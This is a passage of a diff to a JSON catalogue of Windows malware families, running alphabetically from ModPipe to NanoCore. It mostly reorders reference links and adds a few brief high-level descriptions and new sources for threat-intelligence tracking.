consisting of basic components and downloadable modules. One of them \u2013 named GetMicInfo \u2013 contains an algorithm designed to gather database passwords by decrypting them from Windows registry values. Exfiltrated credentials allow ModPipe's operators access to database contents, including various definitions and configuration, status tables and information about POS transactions. 
", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.modpipe", - "https://www.foregenix.com/blog/modpipe-malware-has-a-new-module-that-siphons-payment-card-data", + "https://www.welivesecurity.com/2020/11/12/hungry-data-modpipe-backdoor-hits-pos-software-hospitality-sector/", "https://www.kroll.com/en/insights/publications/cyber/modpipe-pos-malware-new-hooking-targets-extract-card-data", - "https://www.welivesecurity.com/2020/11/12/hungry-data-modpipe-backdoor-hits-pos-software-hospitality-sector/" + "https://www.foregenix.com/blog/modpipe-malware-has-a-new-module-that-siphons-payment-card-data" ], "synonyms": [], "type": [] @@ -34244,8 +35835,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.modpos", - "https://www.fireeye.com/blog/threat-research/2015/11/modpos.html", - "https://twitter.com/physicaldrive0/status/670258429202530306" + "https://twitter.com/physicaldrive0/status/670258429202530306", + "https://www.fireeye.com/blog/threat-research/2015/11/modpos.html" ], "synonyms": [ "straxbot" @@ -34287,9 +35878,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moker", "http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network", - "https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/", "https://breakingmalware.com/malware/moker-part-2-capabilities/", - "https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/" + "https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/", + "https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/" ], "synonyms": [], "type": [] 
@@ -34302,8 +35893,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes", - "https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/", - "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" + "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/", + "https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/" ], "synonyms": [], "type": [] @@ -34343,11 +35934,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader", - "https://www.0ffset.net/reverse-engineering/malware-analysis/molerats-string-decryption/", + "http://www.clearskysec.com/iec/", "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", - "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/", + "https://www.0ffset.net/reverse-engineering/malware-analysis/molerats-string-decryption/", "https://www.proofpoint.com/us/blog/threat-insight/new-ta402-molerats-malware-targets-governments-middle-east", - "http://www.clearskysec.com/iec/" + "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/" ], "synonyms": [], "type": [] 
@@ -34360,11 +35951,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner", - "https://news.sophos.com/en-us/2021/10/24/node-poisoning-hijacked-package-delivers-coin-miner-and-credential-stealing-backdoor", "https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/", + "https://asec.ahnlab.com/en/37526/", "https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux", - "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/", - "https://asec.ahnlab.com/en/37526/" + "https://news.sophos.com/en-us/2021/10/24/node-poisoning-hijacked-package-delivers-coin-miner-and-credential-stealing-backdoor", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/" ], "synonyms": [ "CoinMiner" @@ -34379,7 +35970,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moneymessage", - "https://yoroi.company/research/money-ransomware-the-latest-double-extortion-group/" + "https://yoroi.company/research/money-ransomware-the-latest-double-extortion-group/", + "https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/", + "https://resources.securityscorecard.com/research/analysis-money-message-ransomware" ], "synonyms": [], "type": [] @@ -34420,10 +36013,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonbounce", - "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/19115831/MoonBounce_technical-details_eng.pdf", "https://www.binarly.io/posts/A_deeper_UEFI_dive_into_MoonBounce/index.html", - "https://habr.com/ru/amp/post/668154/" + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/19115831/MoonBounce_technical-details_eng.pdf", + "https://habr.com/ru/amp/post/668154/", + "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/" ], "synonyms": [], "type": [] 
@@ -34450,11 +36043,11 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moriagent", "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a", - "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf", - "https://live.paloaltonetworks.com/t5/custom-signatures/how-to-stop-mortiagent-malware-using-the-snort-rule/td-p/326590#", - "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://twitter.com/Timele9527/status/1272776776335233024", + "https://live.paloaltonetworks.com/t5/custom-signatures/how-to-stop-mortiagent-malware-using-the-snort-rule/td-p/326590#", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611", "https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/" ], "synonyms": [], @@ -34506,9 +36099,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.morto", - "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A", + "http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html", "https://www.f-secure.com/weblog/archives/00002227.html", - "http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html" + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A" ], "synonyms": [], "type": [] 
@@ -34547,14 +36140,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito", - "https://www.secureworks.com/research/threat-profiles/iron-hunter", "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", - "https://www.recordedfuture.com/turla-apt-infrastructure/", - "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", - "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html", - "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/", - "https://go.recordedfuture.com/hubfs/reports/cta-2020-0312.pdf" + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", + "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html", + "https://www.recordedfuture.com/turla-apt-infrastructure/", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0312.pdf", + "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", + "https://www.secureworks.com/research/threat-profiles/iron-hunter" ], "synonyms": [], "type": [] 
@@ -34563,38 +36156,39 @@ "value": "Mosquito" }, { - "description": "According to BlackBerry, MountLocker is a Ransomware-as-a-Service (RaaS), active since July 2020\r\nThe MountLocker ransomware was updated during early November 2020 to broaden the targeting of file types and evade security software.\r\nVictim’s files are encrypted using ChaCha20, and file encryption keys are encrypted using RSA-2048.\r\nThe ransomware appears to be somewhat secure; there are no trivial weaknesses allowing for easy key recovery and decryption of data. MountLocker does however use a cryptographically insecure method for key generation that may be prone to attack.", + "description": "According to BlackBerry, MountLocker is a Ransomware-as-a-Service (RaaS), active since July 2020\r\nThe MountLocker ransomware was updated during early November 2020 to broaden the targeting of file types and evade security software.\r\nVictim\u2019s files are encrypted using ChaCha20, and file encryption keys are encrypted using RSA-2048.\r\nThe ransomware appears to be somewhat secure; there are no trivial weaknesses allowing for easy key recovery and decryption of data. 
MountLocker does however use a cryptographically insecure method for key generation that may be prone to attack.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mount_locker", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry", - "https://github.com/Finch4/Malware-Analysis-Reports/tree/main/MountLocker", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://www.bleepingcomputer.com/news/security/biotech-research-firm-miltenyi-biotec-hit-by-ransomware-data-leaked/", - "https://blogs.blackberry.com/en/2021/11/zebra2104", + "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/", + "https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry", "https://news.sophos.com/en-us/2021/03/31/sophos-mtr-in-real-time-what-is-astro-locker-team/", - "https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-virtual-machines", + "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-joins-the-multi-million-dollar-ransom-game/", + "https://chuongdong.com/reverse%20engineering/2021/05/23/MountLockerRansomware/", + "https://securityscorecard.pathfactory.com/research/quantum-ransomware", + "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html", + "https://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/", + "https://dissectingmalwa.re/between-a-rock-and-a-hard-place-exploring-mount-locker-ransomware.html", + 
"https://blogs.blackberry.com/en/2021/11/zebra2104", + "https://community.riskiq.com/article/47766fbd", + "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", "https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/", "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", - "https://www.guidepointsecurity.com/mount-locker-ransomware-steps-up-counter-ir-capabilities/", - "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", - "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-joins-the-multi-million-dollar-ransom-game/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-virtual-machines", - "https://community.riskiq.com/article/47766fbd", + "https://github.com/Finch4/Malware-Analysis-Reports/tree/main/MountLocker", + "https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/", "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", - "https://chuongdong.com/reverse%20engineering/2021/05/23/MountLockerRansomware/", - "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/", - 
"https://securityscorecard.pathfactory.com/research/quantum-ransomware", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.guidepointsecurity.com/mount-locker-ransomware-steps-up-counter-ir-capabilities/", "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-now-targets-your-turbotax-tax-returns/", - "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/", - "https://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/", - "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", - "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/", - "https://dissectingmalwa.re/between-a-rock-and-a-hard-place-exploring-mount-locker-ransomware.html", - "https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html" + "https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [ "DagonLocker", @@ -34619,7 +36213,7 @@ "value": "Moure" }, { - "description": "", + "description": "According to PCrisk, Mozart is malicious software that allows attackers (cyber criminals) to execute various commands on an infected computer through the DNS protocol. This communication method helps cyber criminals to avoid detection via security software. Mozart is categorized as a malware loader and executes commands that cause download and installation of malicious software.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart", 
@@ -34637,8 +36231,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpkbot", - "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf", - "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" ], "synonyms": [ "MPK" @@ -34653,6 +36247,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mqsttang", + "https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/", "https://www.welivesecurity.com/2023/03/02/mqsttang-mustang-panda-latest-backdoor-treads-new-ground-qt-mqtt/" ], "synonyms": [ @@ -34720,8 +36315,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.multigrain_pos", - "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", - "https://www.pandasecurity.com/mediacenter/malware/multigrain-malware-pos/" + "https://www.pandasecurity.com/mediacenter/malware/multigrain-malware-pos/", + "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html" ], "synonyms": [], "type": [] @@ -34748,10 +36343,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet", - "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", + "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", "https://www.wired.com/2017/03/russian-hacker-spy-botnet/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", - "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf" + "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf" ], "synonyms": [], "type": [] 
@@ -34777,10 +36372,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydogs", - "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html", - "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/", "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html", - "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html" + "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html", + "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/", + "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html" ], "synonyms": [], "type": [] 
@@ -34793,11 +36388,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydoom", - "https://www.malware-traffic-analysis.net/2018/12/19/index.html", + "https://www.giac.org/paper/gcih/619/mydoom-backdoor/106503", "https://www.giac.org/paper/gcih/568/mydoom-dom-anlysis-mydoom-virus/106069", - "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "http://ivanlef0u.fr/repo/madchat/vxdevl/papers/analysis/mydoom_b_analysis.pdf", - "https://www.giac.org/paper/gcih/619/mydoom-backdoor/106503" + "https://www.malware-traffic-analysis.net/2018/12/19/index.html", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf" ], "synonyms": [ "Mimail", @@ -34813,12 +36408,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader", - "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/", - "http://download.ahnlab.com/kr/site/library/[AhnLab]Analysis%20Report_MyKings%20Botnet.pdf", - "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", - "https://sophos.files.wordpress.com/2019/12/mykings_report_final.pdf", "https://decoded.avast.io/janrubin/the-king-is-dead-long-live-mykings/", - "https://blog.talosintelligence.com/2020/07/valak-emerges.html" + "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", + "https://blog.talosintelligence.com/2020/07/valak-emerges.html", + "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/", + "https://sophos.files.wordpress.com/2019/12/mykings_report_final.pdf", + "http://download.ahnlab.com/kr/site/library/[AhnLab]Analysis%20Report_MyKings%20Botnet.pdf" ], "synonyms": [], "type": [] 
@@ -34827,17 +36422,17 @@ "value": "MyKings Spreader" }, { - "description": "", + "description": "According to PCrisk, MyloBot is a high-risk trojan-type virus that allows cyber criminals to control the infected machine. MyloBot can be considered as a botnet, since all infected computers are connected to a single network. Depending on cyber criminals' goals, infected machines might be misused or have additional infections applied.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot", - "http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html", "https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/", + "http://www.freebuf.com/column/153424.html", "https://www.bitsight.com/blog/mylobot-investigating-proxy-botnet", "https://blogs.akamai.com/sitr/2021/01/detecting-mylobot-unseen-dga-based-malware-using-deep-learning.html", "https://blog.centurylink.com/mylobot-continues-global-infections/", "https://github.com/360netlab/DGA/issues/36", - "http://www.freebuf.com/column/153424.html" + "http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html" ], "synonyms": [ "FakeDGA", 
@@ -34861,6 +36456,19 @@ "uuid": "c9b5b0b2-45af-43f2-8eb4-e13493c1342e", "value": "MysterySnail" }, + { + "description": "According to ZScaler, a new information stealer that was first advertised in April 2023, capable of stealing credentials from nearly 40 web browsers and more than 70 browser extensions, also targeting cryptocurrency wallets, Steam, and Telegram. The code is heavily obfuscated making use of polymorphic string obfuscation, hash-based import resolution, and runtime calculation of constants.\r\nMystic implements a custom binary protocol that is encrypted with RC4.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mystic_stealer", + "https://www.zscaler.com/blogs/security-research/mystic-stealer" + ], + "synonyms": [], + "type": [] + }, + "uuid": "226a9241-e4de-49d0-bb30-4550221f3f9f", + "value": "Mystic Stealer" + }, { "description": "", "meta": { @@ -34881,10 +36489,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.n40", - "http://blog.en.elevenpaths.com/2018/05/new-report-malware-attacks-chilean.html", + "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector", "https://socprime.com/en/news/attackers-exploit-dll-hijacking-to-bypass-smartscreen/", - "http://reversingminds-blog.logdown.com/posts/7807545-analysis-of-advanced-brazilian-banker-malware", - "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector" + "http://blog.en.elevenpaths.com/2018/05/new-report-malware-attacks-chilean.html", + "http://reversingminds-blog.logdown.com/posts/7807545-analysis-of-advanced-brazilian-banker-malware" ], "synonyms": [], "type": [] 
@@ -34909,11 +36517,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nachocheese", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239b", "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf", - "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/", - "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://raw.githubusercontent.com/eric-erki/APT_CyberCriminal_Campagin_Collections/master/2017/2017.05.30.Lazarus_Arisen/Group-IB_Lazarus.pdf", + "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf", "https://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239b" + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/" ], "synonyms": [ "Cyruslish", @@ -34943,9 +36553,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/" + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf" ], "synonyms": [ "Sacto" 
@@ -34960,59 +36570,59 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/image-file-trickery-part-ii-fake-icon-delivers-nanocore/",
- "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
- "https://goggleheadedhacker.com/blog/post/11",
- "https://www.ic3.gov/media/news/2020/200917-1.pdf",
- "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
- "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52?sk=00be46bc5bf99e8ab67369152ceb0332",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html",
- "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services",
- "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://community.riskiq.com/article/24759ad2",
- "https://intel471.com/blog/privateloader-malware",
- "https://www.secureworks.com/research/darktortilla-malware-analysis",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://zero2auto.com/2020/06/07/dealing-with-obfuscated-macros/",
- "https://malwareindepth.com/defeating-nanocore-and-cypherit/",
- "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
- "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/",
- "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.Nanocore",
- "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html",
- "https://community.riskiq.com/article/ade260c6",
- "https://blog.morphisec.com/syk-crypter-discord",
- "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
- "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
- "https://medium.com/@M3HS1N/malware-analysis-nanocore-rat-6cae8c6df918",
- "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/",
- "https://medium.com/@the_abjuri5t/nanocore-rat-hunting-guide-cb185473c1e0",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
- "https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat",
- "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
- "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
 "https://www.crowdstrike.com/blog/weaponizing-disk-image-files-analysis/",
- "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/elfin-indictments-iran-espionage",
- "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread",
- "https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html",
- "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/",
- "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
- "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
 "https://assets.virustotal.com/reports/2021trends.pdf",
- "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/"
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services",
+ "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/",
+ "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages",
+ "https://www.secureworks.com/research/darktortilla-malware-analysis",
+ "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52?sk=00be46bc5bf99e8ab67369152ceb0332",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
+ "https://goggleheadedhacker.com/blog/post/11",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.Nanocore",
+ "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/",
+ "https://community.riskiq.com/article/24759ad2",
+ "https://community.riskiq.com/article/ade260c6",
